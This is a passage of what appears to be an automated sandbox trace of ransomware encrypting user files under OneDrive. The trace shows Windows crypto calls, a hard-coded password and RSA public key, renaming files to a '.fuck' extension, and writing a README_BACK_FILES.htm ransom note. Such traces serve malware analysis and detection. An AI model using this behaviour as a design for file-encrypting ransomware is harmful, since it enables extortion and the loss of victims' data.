lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.323] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.323] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.323] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.323] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.323] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.323] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.323] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.324] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.324] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.324] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.324] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.324] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.324] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.325] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.325] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.325] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.325] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.325] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.325] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.325] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.325] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.325] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.325] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0281.325] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x2d0, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x2e0) returned 1 [0281.325] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x2e0, lpOverlapped=0x0) returned 1 [0281.325] CloseHandle (hObject=0x5d68) returned 1 [0281.326] CloseHandle (hObject=0x5d80) returned 1 [0281.326] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0281.352] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0281.353] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0281.355] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0281.357] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0281.357] CryptDestroyKey (hKey=0x2fc208) returned 1 [0281.357] CryptReleaseContext (hProv=0x2f1ebb8, dwFlags=0x0) returned 1 [0281.357] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0281.357] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0281.358] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\readme_back_files.htm")) returned 0xffffffff [0281.358] AreFileApisANSI () returned 1 [0281.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889480, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0281.358] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0281.360] GetFileType (hFile=0x5d3c) returned 0x1 [0281.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0281.361] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.362] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0281.362] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.362] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.362] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.362] GetLastError () returned 0x0 [0281.362] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.362] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.363] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.364] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mr\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.365] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mr\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.366] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1f190) returned 1 [0281.369] CryptCreateHash (in: hProv=0x2f1f190, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.369] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0281.369] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.369] CryptDeriveKey (in: hProv=0x2f1f190, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc8c8) returned 1 [0281.369] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.369] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.369] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1e910) returned 1 [0281.370] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1e910, dwCertEncodingType=0x1, pInfo=0x2f36870*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f368a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f368a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc208) returned 1 [0281.370] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.370] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e998*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e998*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.370] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1e998*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e998*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.371] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.379] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.380] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.393] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.394] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.394] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.395] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.395] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.395] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.395] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.396] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.396] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.396] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.396] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.396] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.396] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.396] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.396] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.397] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.397] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.397] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.397] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.397] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.397] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.397] CryptEncrypt (in: hKey=0x2fc8c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.397] WriteFile (in: 